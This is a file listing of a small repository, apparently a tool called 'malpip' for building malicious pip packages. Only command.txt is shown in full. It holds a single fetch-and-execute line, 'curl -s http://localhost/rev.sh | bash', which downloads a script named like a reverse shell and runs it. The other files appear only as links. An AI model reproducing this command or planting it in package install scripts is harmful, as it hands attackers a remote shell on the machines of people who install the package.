├── LICENSE ├── README.md ├── command.txt ├── malpip.sh └── setup_template.py /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thegoodhackertv/malpip/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thegoodhackertv/malpip/HEAD/README.md -------------------------------------------------------------------------------- /command.txt: -------------------------------------------------------------------------------- 1 | curl -s http://localhost/rev.sh | bash 2 | -------------------------------------------------------------------------------- /malpip.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thegoodhackertv/malpip/HEAD/malpip.sh -------------------------------------------------------------------------------- /setup_template.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thegoodhackertv/malpip/HEAD/setup_template.py --------------------------------------------------------------------------------